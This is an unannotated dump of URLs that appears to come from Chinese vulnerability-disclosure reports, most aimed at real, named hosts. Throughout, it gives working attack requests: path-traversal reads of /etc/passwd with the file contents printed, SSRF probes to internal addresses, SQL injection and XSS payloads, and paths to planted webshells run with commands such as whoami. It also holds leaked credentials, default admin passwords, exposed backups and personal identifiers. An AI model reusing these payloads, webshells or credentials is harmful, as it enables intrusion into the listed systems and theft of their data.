http://61.129.93.48/uddiexplorer/SearchPublicRegistries.jsp?operator=http://21.10.6.12:7001&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://61.129.93.41/uddiexplorer/SearchPublicRegistries.jsp?operator=http://21.10.6.12:7001&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search 
http://www.einfo.net.cn/whut2/browser/signup_step2.jsp?cid=acunetix.txt&cid2=1&cidname=%C9%ED%B7%DD%D6%A4&enter_year=&learn_level=q&majorName=&major_id=&recruit_id=&season=&signupType=&sitename=&site_id= http://**.**.**.**/Contents/news/module/20151117105052*/S_i/3/3.xhtml https://**.**.**.**:8080/dubbo-admin/ https://**.**.**.**:8080/ http://**.**.**.**/ http://**.**.**.**.mo/ http://**.**.**.**.mo/c_news/radio_news.php http://**.**.**.**/qylp.asp?classID=266 http://ework.org.hc360.com/ http://nps.hc360.com/nps/innovation/my.htm http://**.**.**.**:8080/alumnioss/admin/login!doLogin.action http://**.**.**.**/ http://**.**.**.**/bea_wls_internal/360.jsp http://corp.b2b.cn/content/Content/index/id/533 http://corp.b2b.cn/content/Content/index?id=533 http://**.**.**.**/connections/productlist.aspx?c=120517&b=&p=&sort=new&page=1&_=1452495106789&b=&c=1&p=&page=1&sort=new&_=1452495106789 http://**.**.**.** https://vbank.jsbchina.cn http://kfhz.daoyoudao.com http://auman.360che.com/viewthread.php?tid=397430&page=3 http://shop.zymk.cn/index.php/home/search/index?keyword=抱枕&order=click_count http://passport.tuniu.com http://**.**.**.**/admin/login.php http://**.**.**.**/bugs/wooyun-2014-085980 http://**.**.**.**/config/const.system.php http://ibst.usst.edu.cn/news.asp?id=66 http://carbon.usst.edu.cn/team.asp?id=86 http://wenku.baidu.com/view/dcabc173c8d376eeafaa3129.html?from=search泄露了中国铁塔股份有限公司FSU管理VPN,类型:L2TP,账号:ttcw2015 IP:101.227.248.109.拨号登录后,根据所获取的IP段,对全网段进行80端口登录,发现有大量使用默认密码admin的FSU设备,登录后可以做任意操作。有部分FSU记录了基站的GPS定点,甚至有远程开锁功能。 http://oa.fun.tv/seeyon/main.do http://120.131.2.30/transformer_jinshan/admin/index/ http://**.**.**.**/bugs/wooyun-2016-0168680 index.php/user/login http://**.**.**.**/Article_List.aspx?ClassID=1 http://**.**.**.**/soft/35768.htm http://trihope.w322.bizcn.com/ly_detail.asp?ly_id=751 http://re.ip66.com/admin.php site:http://www.bkjx1.sdu.edu.cn/ filetype:xls site:http://www.bkjx1.sdu.edu.cn/ filetype:xls site:http://www.*.sdu.edu.cn/ filetype:xls 
http://www.bkjx1.sdu.edu.cn/userfiles/ http://www.bkjx1.sdu.edu.cn/uploadfiles/ filetype:xls http://pan.baidu.com/s/1o721KF4 http://www.hp1997.com/Control/cityInfo.ashx?method=city&rid=278 http://**.**.**.**/install/c.asp http://**.**.**.**:8090/存在“Java http://**.**.**.**:7001/ http://**.**.**.**是东北师范大学文学院 http://**.**.**.**/index_show.php?typeid=41&m_id=10&page=1这个链接中m_id和page做了比较好的过滤,但是没有对typeid作过滤。 http://**.**.**.**/index_show.php?typeid=41‘&m_id=10&page=1 http://**.**.**.**:7001/defaultroot/desktop.jsp http://555caipiao.com/ctzq/?betTypeId=38&issueNum=2016009 http://m.ubox.cn/ http://**.**.**.**/index.php?m=fdirectory&a=search http://cr.kuwo.cn/.svn/entries http://60.28.210.99:4000/ http://www.lemall.com/zhongchou/orderdetails.html?orderid=201601131046651212 http://www.lemall.com/zhongchou/orderdetails.html?orderid=201601130158377422 http://www.lemall.com/zhongchou/orderdetails.html?orderid=201601130188934808 http://www.lemall.com/zhongchou/orderdetails.html?orderid=201601130279269456 http://scm.beequick.cn/ http://uc.263.net/ http://uc.263.net/ma/web/usc/action/bill/list/recharge.do?sid=uid_pc_100000000405&_t=1452739998706 cn:9200存在admin/zabbix默认账户及口令。 http://iyouxi.baidu.com/youxi_rest.xhtml?sort=%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E http://iyouxi.baidu.com/login_game_by_zone.xhtml?to=enterV2&id=%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E&pid=11300600091_972909 http://live.quanshi.com/server-info http://live.quanshi.com/server-status http://219.143.252.170/ http://www.nyist.net/ http://222.139.215.209/ http://222.139.215.209/t9/core/funcs/netdisk/index.jsp?seqId=0&filePath=D:/& display:none就可以了 http://222.139.215.209:8080/phpMyAdmin/ http://222.139.215.209:8080/xiaowu http://**.**.**.**/e-go/heart_detail.asp?HidDID=21 https://github.com/bestvivi/mailtransport/blob/a2108e0b75096c457e8c1853f7c79657bcaae01b/transportmail.py http://219.143.252.170/seeyon/index.jsp http://**.**.**.**/News_info.php?id=24 https://111.204.123.119/admin/ 
http://www.jia.com/citylist/ask_city_list.php?callback=jQuery172026691810227930546_1452738150949&provinces=1*&_=1452738167755 http://qiantu.xdf.cn/wcm/app/login.jsp http://**.**.**.**/affairDetail.jsp?affairID=9d0c134f018eb171088250a148c050d8 http://**.**.**.**/educationDetail.jsp?educationID=f6303cb5a4b91420ca291c0e2c34b539 http://**.**.**.**/login.portal http://**.**.**.**/getBackPassword.portal http://**.**.**.**:8000/ http://103.255.94.185:8080/ui/#/apps/%2Fpassport/configuration http://www.yijifen.com/dologin.do http://219.141.242.77:7005/Alianture_frame/login.do http://219.141.242.77:7005/jbossass/jbossass.jsp http://219.141.242.77:7005/jbossass/jbossass.jsp?ppp=whoami http://www.dcdisplay.com/ http://www.dcdisplay.com/tp/include/fckeditor/editor/filemanager/connectors/test.html# http://admin-d.dty18.com/index.php/Public/login帐号密码都是admin http://admin-m.dty18.com/index.php/Public/login/帐号密码都是admin http://**.**.**.**:80/?act=search&keyword=2016 http://uc.263.net/ma/web/jsp/usc/index.jsp http://uc.263.net/ma/web//usc/action/app/webMailUrl.do https://mm.263.com/sadLogin.do?usr=admin@net263.com&sessionkey=admin@net263.comwm_656916399594561452757460fqhg45Odx2FnUj0p4ncxjY4XZHsADRgtHMZLR&bindid=000000 http://ad.yingxiong.com/site/login http://ad.yingxiong.com/site/login/error/%E5%AF%86%E7%A0%81%E9%94%99%E8%AF%AF http://changba.kuwo.cn/ http://**.**.**.**/news01.asp?news_index=74 http://**.**.**.**/product02.asp?sonclass=140 http://**.**.**.**/product.php?prod_item_id=10 http://**.**.**.**/ http://t.trs.com.cn/weibo_Platform_Index.do http://bk.travelsky.com/bkair/page/users/front/userLogin.jsp http://58.56.60.68:8088/yyoa/index.jsp http://qd.emaradx.com/agentquery.do finance.landray.com.cn/admin/ http://**.**.**.**/board/info/info_dtl.asp?dept_code=0000&serno=1192 http://**.**.**.**/ http://202.121.64.42:801/edoas2/login.jsp https://**.**.**.**/hk/financial/SeminarInfo?seminarCode=20160114JP http://chajian.jia.com/kaoshi/ http://chajian.jia.com/kaoshi/admin/ 
http://chajian.jia.com/kaoshi/admin/index.php?lfj=alonepage&job=list http://**.**.**.**:8050/sms_manage/ http://wt.**.**.**.**:8080/gsdtms/consignOrderActionForWindow!findOrder.action http://**.**.**.**:7070/gsdwl/showOperate.do?consign_no=1003020012B http://103.255.94.27/backup/weixin_reg.php http://103.255.94.27 http://top.yingxiong.com http://top.yingxiong.com/site/login http://im.youshang.com/live800/downlog.jsp?path=/&fileName=/etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh http://219.143.252.170/seeyon/index.jsp http://top.yingxiong.com/ http://admin.jia.com/ http://218.57.146.147:8333/mp/rest/ http://115.29.111.94:8080/ user:admin http://**.**.**.**/admin/login.jsp;jsessionid=22B3BAC03A64C2E4CBDF679E641D6870 http://zs.xust.edu.cn/searchys.jsp?years=2013 http://**.**.**.**/ www.yiban.cn http://202.108.145.118/ http://202.108.145.118/log.txt http://202.108.145.134/ jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:dev jdbc:oracle:thin:@**.**.**.**:1521:bjzdgb1 jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:sonata jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:hnuncdb jdbc:mysql://localhost:3306/test?useUnicode=false&characterEncoding=UTF-8 http://**.**.**.**/ueditor/php/upload/20151102/14464462331213.xls http://mt.sogou.com/WebResource.axd?d=1450089073 http://mt.sogou.com/WebResource.axd?d=9MBwmxN6TLKjC8S3CdFGyw2 http://mt.sogou.com/g2/M00/06/A6/CoZsllaXllqAJE9yAAAAppGzKZ070.html http://**.**.**.** http://**.**.**.**/postdoctor/down.php?f=Ly4uLy4uL2NuL2luZGV4LnBocA== http://**.**.**.**/postdoctor/down.php?f=Ly4uLy4uL2luY2x1ZGVzL2NvbmZpZy5pbmMucGhw 
www.bazirim.tv/phpmyadmin http://222.172.222.114/upaypc http://222.172.222.114:80 http://124.115.26.74:8081/article?id=107 http://**.**.**.**/ http://ziyuan.51taoshi.com/fore/zycenter/showZy.action?lxMess=-1 https://e.189.cn/register/mobile/step1.do http://fanxing.kugou.com/ac/kefu,选择使用天翼账号登陆爆破天翼账号密码 http://www2.lib.nankai.edu.cn/nav/ http://**.**.**.**/xzfwzx/newsQueryList.html;jsessionid=2B5F84975B78358EFD119D85D4FCB2F5?typeId=1200 http://mt.sogou.com/app/user/user?id=4762 http://**.**.**.**/HR/V_ResumeData/UResumeTable?cadetid=SXHZ20150110000052&see=1&cadet=1&close=true url:http://**.**.**.** http://**.**.**.**/HR/V_CadetAuditWork/grid?qn_eq_IsDelete=0&q_eq_RIdentityCard=330481199402180049&q_eq_ResumeID=JLHZ20151010000061 http://login.cang.com/register.html http://**.**.**.**:7001/存在“Java http://**.**.**.**:7001/存在“Java http://**.**.**.**:7001/存在“Java http://**.**.**.**/Channelnew/lawguidelist.aspx?inforId=00270存在注入点 http://oauth.tops001.com/login.html http://oauth.tops001.com/index.html#/retrievepd/newpd?type=id&loginName=13*******21&code=5362 http://oa.ccib.com.cn/login.asp  http://oa.ccib.com.cn http://122.225.59.249:8080 http://122.225.59.249:8080/script http://m2.xianguo.com/homeindex/list?cid=1&tagid=100_33 http://t.news.elong.com http://**.**.**.**/products.php?pc_index=19&pc2_index=58 http://211.151.62.149:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd http://211.151.62.149:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/home/glassfish/glassfish4/glassfish/domains/domain1/config/ https://yoopay.cn/ http://**.**.**.**/bbs/plugin.php?id=myshop:myshopShow&cid=103&gid=110&market=0 http://easternmiles.ceair.com/mpf/#/sign/register https://passport.ceair.com/cesso/login.html?redirectUrl=http%3A%2F%2Fwww.ceair.com%2F<v=1&local=zh_CN 
http://mp.allinpay.com http://**.**.**.**/ncut_oga_2013/front/main.php?pageNum_Recordset1=0&totalRows_Recordset1=20&lnk=front_news_single.php&Unit=6 http://51zhonghua.com/area/findAllCity2.action?pid=1 http://61.160.82.220:7001/eservice/eservice/account/login.action?action=init http://**.**.**.**:8080 http://www.haoshouwang.com/you/goods/id/276 http://mcmp.suning.com/mcmp/sales/downloadImg.htm file:///etc/passwd http://**.**.**.**/ http://**.**.**.**/index.php http://**.**.**.**/ http://www.pptv.com/ http://cdn1.showjoy.com/.svn/entries http://61.160.82.219:7003/payment/ http://218.66.13.64 http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=file://///etc/hosts http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=ftp://192.168.86.43/inc/ http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=http://192.168.86.26 http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=http://10.100.21.3/message.shtml http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=http://192.168.52.111 http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=http://192.168.86.191 http://e.waimai.meituan.com/file/app/download http://waimaieapi.meituan.com/api/account/retrievePwd/reset http://oa.sinopharm.com/ http://oa.sinopharm.com/seeyon//logs/login.log http://oa.cnbg.com.cn/seeyon//logs/login.log https://mail.guodu.com http://www.8168.com.cn/loginUI.action http://www.jxrw.com:80/search.php?searchname=%e8%af%b7%e8%be%93%e5%85%a5%e6%82%a8%e8%a6%81%e6%90%9c%e7%b4%a2%e7%9a%84%e5%86%85%e5%ae%b9&send=12345 http://www.ttkdex.com.hk:8080/hlgt/user/main.php http://60.28.104.133:9060/yyoa/ http://60.28.104.133:9000/ http://now.3g.cn/.svn/entries http://passport.proxy.3g.cn/user/logout?bk=http%3A%2F%2Fwww.wooyun.org&waped=waped http://gos.3g.cn/admin/index.php?r=site/index http://img.3gcdn.cn/nba/nba/images/interlocution_question_153049.php http://img.3gcdn.cn/nba/nba/images/interlocution_question_153423.html http://store.263.net/register/first.html 
http://store.263.net/recharge/buyUserPlan.action?a=0.11769770458340645&mail=wooyun2@263.net&ppid=1000000004&_=1452842159506 http://uc.263.net/ma/web/usc/action/app/webMailUrl.do http://www.263.net/ http://**.**.**.**/console/login/LoginForm.jsp http://**.**.**.**/1.jsp http://fuwu.suning.com/fuwu/portal/detail/ajax/queryDecorationDetail.htm file:/// http://icss.suning.com/icssm-web/pm/yunfeiFreightCommissionCheckController/init.htm http://**.**.**.**/shouye/common/more.jsp?cat=1003013 http://**.**.**.**/cms/index.php http://j.m.leju.com/ http://j.m.leju.com http://**.**.**.**/login/login.init.do?returnUrl=http://**.**.**.**/os/html/index.init.do&elnScreen=1366*768elnScreen)存在管理员弱口令登录,可查看大量内部学习资料 http://**.**.**.**/即 http://182.151.206.253/mysql/ http://**.**.**.**/opinions_view.php?id=97 http://**.**.**.**/admin/login.php http://120.199.7.135/downloadSoftware.action?inputPath=%2FuploadSoftware%5C20050319012047.rar http://**.**.**.**/MiceOther/Memberstyle.asp?id=22 http://**.**.**.**/news.asp?id=22&tname=%CA%D5%B2%D8%D7%CA%D1%B6 http://**.**.**.**/newsite/readtxt.asp?id=227273 http://**.**.**.**/examRule.php?id=1 http://**.**.**.**/bugs/wooyun-2010-0144595 http://nhri.cofco.com/bbs/ http://gxav.91huayi.com/webSite/news_content.aspx?news_id=8c1ba8c5-2116-4fee-b6fb-a11c00048f9e&type_id=1 http://gxav.91huayi.com/ http://red.xunlei.com/index.php?id=../test.php%00&r=site/news http://oil.cofco.com:8081/login.aspx http://162.105.205.19 http://www.wa3.com/ http://www.wa3.com/NewsCard/?gname= http://**.**.**.**/campus http://www.sydoil.com/services_detail.asp?id=1629发现sql注人,今天又发现一注入点 http://www.sydoil.com/products.asp?id=58 http://www.sydoil.com/products.asp?id=58” http://ad.yingxiong.com/ http://work.cybernaut.com.cn/seeyon/index.jsp http://www.cbooo.cn/search?k=1 http://www.cbooo.cn/search?k=1 www.cbooo.cn http://**.**.**.** http://flgm.feiliu.com/qianghaoqi/wx.php?id=2284 http://open.muzhiwan.com/?action=public&opt=login http://wooyun.org/bugs/wooyun-2010-083238 
http://wooyun.org/bugs/wooyun-2010-083101 http://erp.suning.com.cn/iufotempfile/gzwkxo8p2u6ic6iynvlutt9bcvt38w/s2_102628.jsp http://shanghai.daojia.com.cn/service.php?action=1879048193&card= http://beijing.daojia.com.cn/service.php?action=1879048193&card= http://hangzhou.daojia.com.cn//service.php?action=1879048193&card= http://suzhou.daojia.com.cn//service.php?action=1879048193&card= http://nanjing.daojia.com.cn//service.php?action=1879048193&card= http://guangzhou.daojia.com.cn//service.php?action=1879048193&card= http://shenzhen.daojia.com.cn//service.php?action=1879048193&card= http://wuxi.daojia.com.cn//service.php?action=1879048193&card= http://tianjin.daojia.com.cn//service.php?action=1879048193&card= http://changzhou.daojia.com.cn///service.php?action=1879048193&card= http://www.gyxt.com.cn/ http://**.**.**.**/nz0808/manage_web.asp?txt=2&id=web2/index.asp http://www.ku6.com/ http://**.**.**.** http://1.202.165.69:7007/clqprt/ http://1.202.165.69:7007/console shell:http://1.202.165.69:7007/ca/ma3.jsp http://wep.letao.com/ http://**.**.**.** http://**.**.**.** http://180.150.185 ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/ http://m3.xianguo.com/homeindex/list?cid=3&tagid=186_31 http://**.**.**.**/main.aspx?flag=lmMc&lm=%E5%85%9A%E9%A3%8E%E5%BB%89%E6%94%BF http://**.**.**.**/admin/ http://**.**.**.**/admin/Admin_Login.aspx http://**.**.**.**/upload/ http://v.huatu.com/yueka/plan.php?id=9&province=%E5%B9%BF%E4%B8%9C http://wenwen.m.sogou.com/qudetail.jsp?qid=478438204&g_f=18719 http://i.yingxiong.com:80/ http://**.**.**.**/index.php?r=site/detail&pid=307 http://**.**.**.**/index.php?r=site/detail http://**.**.**.**/index.php?r=site/manage http://**.**.**.**/index.php?r=site/main 
http://123.124.175.243/teamleader/ http://123.124.175.243/person/ http://123.124.175.243:80/console shell:http://123.124.175.243/ca/ma3.jsp http://cwy.colourlife.com/praise http://hr.colourlife.com/archive/?keyid=B1&itemid=B1-A http://academy.yonyou.com/ http://**.**.**.**/bugs/wooyun-2010-0108372 http://**.**.**.**/bugs/wooyun-2015-0110098 http://testapi.rrslj.com/appapi/index.php?act=member_order&op=order_detail&member_id=13951038888&order_id=1 https://api.weibo.com/oauth2/authorize http://music.163.com/back/weibo,并带上了授权得到的Access https://api.weibo.com/oauth2/authorize?client_id=301575942&response_type=code&redirect_uri=http://music.163.com/back/weibo&scope=friendships_groups_read,statuses_to_me_read,follow_app_official_microblog http://**.**.**.**/news/news?city=1301&id=492 http://**.**.**.**/zwgk_nr.php?id=22959 dir:I:\Java\Workspaces\MyEclipseforSpring2014\pm-tomcat\webapp\ c5d0:386a:2fb1:5fb1%12 da1e:40c2:87f:3e7e:3f57:f5e8 http://**.**.**.**//resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml http://**.**.**.**//resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml http://**.**.**.**/defaultroot/login.jsp http://219.143.252.48:8080/manager/html http://219.143.252.185:90/invoker/EJBInvokerServlet http://**.**.**.**/ http://106.3.36.125/dgws/ http://106.3.36.125/dgws/home/appointment/newapp?aid=426 http://106.3.36.125/dgws/home/appointment/newapp?aid= http://**.**.**.**/api/icms/getCommentNum.php?id=PAGE1348189639580631 http://sdkim.cmge.com/ http://dt.51zhonghua.com/ http://**.**.**.**/admin.php https://**.**.**.**/index.php?thispage=newsandeventsdetails&cid=2&sid=35&id=1&t=e http://**.**.**.**:8090 http://www.2cto.com/index.php?m=search&c=index&a=init&typeid=1&iteid=1&q=123qwe http://testapi.rrslj.com:80/appapi/index.php?act=goods&op=goods_list&store_id=55 http://123.157.214.9/iceszh/login.jsp http://123.157.214.9/iceszh/index.jsp http://123.157.214.9/iceszh/login!loginIndex.do即可得到登录状态 http://www.51vj.cn/login/forget 
http://job.rhcncpa.com http://dfiles.tms.beisen.com/resume/180002/1452882012/3de2e49c2bcf45239c81da229b89b3f9.jpg?sig_a=new.zhiye.com&sig_t=1452882063&sig=e32aec419edf4bf68471e40754fd2a44430d9e11) http://dfiles.tms.beisen.com/resume/180002/1452881991/62d0637f48a240b5bc1be763fa815da8.html?sig_a=new.zhiye.com&sig_t=1452882063&sig=e32aec419edf4bf68471e40754fd2a44430d9e11 http://agent.tj.fang.com/User/Logon http://**.**.**.**/cms/admin http://**.**.**.**/index.php/zh/)使用模板为joomla,存在远程代码执行漏洞,可获取webshell,然后渗透内网。 http://www.yaolan.com/topic/ylapp/index.shtml http://inner.800bestex.com:8090/admin/index.shtml这个文件,而且是未授权访问。 http://bfr.800best.com/manage/ www.cmd5.com查询之,得到明文密码15834169939 http://event.ztgame.com/tools/cloud-answer-file http://222.73.196.11/ http://222.73.196.11/ztrcloud-openstack-ceph.repo https://github.com/RyanTech/spider-2/ http://www.hahapinche.com/.svn/entries http://bbs.ickey.cn/index.php?ac=myinfo&app=user&userid=57253 http://**.**.**.**/ http://**.**.**.**:9080/vehweb/getsysparaminfoaction=Hd&glbm=123456&xzqh=123456&hpzl=02 http://my.leju.com/ http://my.leju.com/Settings/findPwd/index http://ly.chaoxing.com www.acunetix-referrer.com/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29 e.xbwl.cn/website/aboutXB/11.jsp%3FpageType%3D00%26subType%3D0%26fw%3D320 http://120.199.7.135/services.jsp http://120.199.7.135/downloadContract.action?inputPath=%2FWEB-INF%2Fweb.xml http://kid.chaoxing.com http://**.**.**.** http://**.**.**.**/ http://nscc.hnu.edu.cn/ http://nscc.hnu.edu.cn/Article_NoticeList.aspx?id=13 http://nscc.hnu.edu.cn/Article_NewsList.aspx?id=14 http://nscc.hnu.edu.cn/Article_ApplyList.aspx?id=4 http://**.**.**.**/agent/operatorLogin.action http://ask.lenovo.com.cn/html/approval.html?qid=7855 http://**.**.**.** http://**.**.**.**/bea_wls_internal/she11.jsp jdbc:oracle:thin:@**.**.**.**:1521:sgdba1 http://mpa.tju.edu.cn/page.php?p=5 http://dl.dongfeng-nissan.com.cn/ 
EXP:http://vote.longhoo.net/index.php?m=poster&c=index&a=poster_click&id=1 http://www.dongfeng-honda.com/honda_mediaReport.php?nid=663 http://www.dongfeng-honda.com/cr-v_newyear/.svn/entries http://vac.qq.com/common/pc/pc.html http://imgcache.gtimg.cn/channel/common/pc/js/index-1.js http://2012.paojiao.cn/download_36210_1.html?url=http%3A%2F%2Fwww.wooyun.org http://anzhuo.paojiao.cn/download_37785_1.html?url=http%3A%2F%2Fwww.wooyun.org XSS:http://uc.paojiao.cn/pages/reg.jsp?callback=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://uc.paojiao.cn/pages/login.jsp?callback=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E https://nexus.paojiao.cn/ http://game.kingsunsoft.com/PlayGame.aspx?GameID=@@version http://game.kingsunsoft.com/UserCenterAjax.aspx?UserID=-1%20and%201=convert%28int,%28select%20@@version%29%29--&UserName=jason1208 http://jwc.tyut.edu.cn/Detail.asp?bigId=1 http://116.213.69.250/index.php http://pms.51talk.com/.svn/entries http://ts.51talk.com/.svn/entries s.hk.weibo.com/share/api/users_show.php https://github.com/feiniu7903/feiniu_pet/blob/781d571b8e663ce0c5a98b556a11c1638e22990a/pet/pet_payment/src/main/config/payment.properties http://uhg.9you.com/vip/mall/index/game_id/76.html https://secure.yxb.com/reg.do https://secure.yxb.com/sendSoundSms.do https://secure.yxb.com encap:Ethernet AB:44:AE feab:44ae/64 Scope:Link MTU:1500 packets:87919949 packets:47758751 txqueuelen:1000 http://m.exmail.qq.com/ http://**.**.**.**/ http://**.**.**.**/lingxicloud/uploadfile/2015/0507/beizihuai.php http://fz.ydpic.sgcc.com.cn/Login_login.action http://task.www.sogou.com/taskresult?task_id=7917 http://www.cr-construction.com:99/main.asp http://www.cr-construction.com:99/shownewstest.asp?id=342 http://shop.9you.com http://shop.9you.com/active/active/name/FirstMan/act/ajaxpageall?type=GFriend http://aufamily.9you.com/index.php http://wooyun.org/bugs/wooyun-2016-0170529 http://dw.aoshitang.com https://**.**.**.**/amh1/amhhotel_login_tc.asp 
http://**.**.**.**/co-brand/login.asp http://**.**.**.**/admin/bonus_login.asp http://**.**.**.**/admin/news_login.asp http://**.**.**.**/admin/offers_login.asp index.php/product-getAdjunctPro.html?ijfitnfo http://www.lamiu.com/ http://acm.sdut.edu.cn/sdutoj/shownews.php?nid=24 http://data.aoshitang.com https://**.**.**.**/Docs/?dv=win http://m.mail.sogou.com/ http://aaa.ftms.com.cn/.svn/entries http://event.ftms.com.cn/rav4hd2015/.svn/entries http://event.ftms.com.cn/rav4_wljd/.svn/entries http://event.ftms.com.cn/newcrown.tar.gz http://event.ftms.com.cn/hev.tar.gz http://www.ftms.com.cn/phpMyAdmin/ http://androidtv.25pp.com http://**.**.**.**/bugs/wooyun-2015-0163789 http://**.**.**.**/ldims/login.jsp http://**.**.**.**/bugs/wooyun-2015-0163789 http://**.**.**.**/点击标识1链接后,再点击标识链接2,即可进入系统登录界面。 http://www.bkjx1.sdu.edu.cn/userfiles/20131126/46c01129-12f7-40d1-9075-682e280dde6a.doc http://140.206.94.42:7001存在“Java http://claim.chinalife-p.com.cn/claimCarFlow/flow.do?actionType=queryInfo&accidentNo=NjA1MTAyMDE1MzMwMDAwMDQzMjk5&comCode=MzMwMDAwMDA= http://claim.chinalife-p.com.cn/claimCarFlow/flow.do?actionType=queryInfo&accidentNo=NjA1MDEyMDE1NDQwMDAwMDM1NDc5&comCode=NDQwMDAwMDA= http://claim.chinalife-p.com.cn/claimCarFlow/flow.do?actionType=queryInfo&accidentNo=NjA1MDEyMDE0NDQwMDAwMjQ5Mzc0&comCode=NDQwMDAwMDA= http://claim.chinalife-p.com.cn/claimCarFlow/flow.do?actionType=queryInfo&accidentNo=NjA1MDEyMDE0NDQwMDAwMDk0ODY0&comCode=NDQwMDAwMDA= http://woa.wacom.com.cn http://www.sundan.com/ http://www.sundan.com/data/可进行目录遍历 http://ca.yingxiong.com/ca.tar.gz http://gf.yingxiong.com/gf.tar.gz http://ttx5.yingxiong.com/ttx5.tar.gz http://we.yingxiong.com/we.tar.gz http://xm.yingxiong.com/xm.tar.gz http://cemftp.ce-air.com/yyoa/index.jsp http://cemftp.ce-air.com/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=0&per_id=0 http://wooyun.org/bugs/wooyun-2015-0157574 www.jointwisdom.cn/download/download.php?file=../../../../../../../../../../../etc/passwd 
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin jointwisdomweb:x:500:500::/home/jointwisdomweb:/bin/bash ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash nagios:x:501:501::/home/nagios:/bin/bash http://kjk.haoyisheng.com/kjk/login.jsp http://218.17.224.157/login.jsp http://l.airchina.com.cn/cw/skin1/jsp/download.jsp?file=/WEB-INF/web.xml http://120.25.213.204 ftp://120.25.213.204 ftp://120.25.213.204/charge/ http://**.**.**.**/ http://**.**.**.**/bb/ma3.jsp http://**.**.**.**/ma3.jsp http://**.**.**.**/tw/newspost.php?id=2265 http://**.**.**.**/tw/newspost.php?id=2079 http://**.**.**.**/tw/user.php?id=14196 http://**.**.**.**/tw/shop_list.php?ar1=&ar2=&sty=9 http://**.**.**.**/tw/news_list.php?type=a http://**.**.**.**/tw/newspost.php?id=2265 http://bbs.crvanguard.com.cn/user/login/.kisin http://bbs.crvanguard.com.cn http://bbs.crvanguard.com.cn/user/login/.kisin 
